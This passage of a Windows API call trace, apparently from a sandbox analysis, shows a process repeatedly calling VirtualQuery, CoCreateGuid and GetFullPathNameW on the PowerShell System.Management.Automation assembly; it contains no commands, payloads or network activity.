	[0161.809] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.811] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.811] VirtualQuery (in: lpAddress=0x10d0fc, lpBuffer=0x10e0fc, dwLength=0x1c | out: lpBuffer=0x10e0fc*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.811] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.812] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.812] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.813] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.813] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xefa3b226, Data2=0xea8f, Data3=0x4ea0, Data4=([0]=0x83, [1]=0x5b, [2]=0x5a, [3]=0xdd, [4]=0x74, [5]=0xdd, [6]=0x3, [7]=0x7a))) returned 0x0
	[0161.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.813] GetLastError () returned 0x0
	[0161.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.813] GetLastError () returned 0x0
	[0161.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.813] GetLastError () returned 0x0
	[0161.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.813] GetLastError () returned 0x0
	[0161.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.813] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.814] GetLastError () returned 0x0
	[0161.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.815] GetLastError () returned 0x0
	[0161.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.815] GetLastError () returned 0x0
	[0161.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.815] GetLastError () returned 0x0
	[0161.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.815] GetLastError () returned 0x0
	[0161.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.815] GetLastError () returned 0x0
	[0161.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.815] GetLastError () returned 0x0
	[0161.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.815] GetLastError () returned 0x0
	[0161.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.816] GetLastError () returned 0x0
	[0161.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.816] GetLastError () returned 0x0
	[0161.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.816] GetLastError () returned 0x0
	[0161.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.816] GetLastError () returned 0x0
	[0161.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.816] GetLastError () returned 0x0
	[0161.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.816] GetLastError () returned 0x0
	[0161.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.816] GetLastError () returned 0x0
	[0161.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.817] GetLastError () returned 0x0
	[0161.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.817] GetLastError () returned 0x0
	[0161.817] VirtualQuery (in: lpAddress=0x10d2c0, lpBuffer=0x10e2c0, dwLength=0x1c | out: lpBuffer=0x10e2c0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.817] GetLastError () returned 0x0
	[0161.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.817] GetLastError () returned 0x0
	[0161.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.817] GetLastError () returned 0x0
	[0161.818] VirtualQuery (in: lpAddress=0x10d2c0, lpBuffer=0x10e2c0, dwLength=0x1c | out: lpBuffer=0x10e2c0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.818] GetLastError () returned 0x0
	[0161.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.818] GetLastError () returned 0x0
	[0161.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.818] GetLastError () returned 0x0
	[0161.818] VirtualQuery (in: lpAddress=0x10d2c0, lpBuffer=0x10e2c0, dwLength=0x1c | out: lpBuffer=0x10e2c0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.819] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.819] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.820] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.821] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.821] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.821] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.821] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.822] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.822] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.822] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.823] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.823] VirtualQuery (in: lpAddress=0x10d0fc, lpBuffer=0x10e0fc, dwLength=0x1c | out: lpBuffer=0x10e0fc*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.823] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.824] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.824] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.825] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.825] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x19c172ac, Data2=0x6a68, Data3=0x4460, Data4=([0]=0x88, [1]=0x5c, [2]=0x88, [3]=0xae, [4]=0x30, [5]=0x4, [6]=0xdb, [7]=0x95))) returned 0x0
	[0161.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.825] GetLastError () returned 0x0
	[0161.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.825] GetLastError () returned 0x0
	[0161.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.825] GetLastError () returned 0x0
	[0161.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.825] GetLastError () returned 0x0
	[0161.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.826] GetLastError () returned 0x0
	[0161.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.826] GetLastError () returned 0x0
	[0161.826] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x7dc9be16, Data2=0x5b3d, Data3=0x48b7, Data4=([0]=0x89, [1]=0xa3, [2]=0xf2, [3]=0x23, [4]=0x83, [5]=0x70, [6]=0x25, [7]=0xe2))) returned 0x0
	[0161.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.826] GetLastError () returned 0x0
	[0161.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.826] GetLastError () returned 0x0
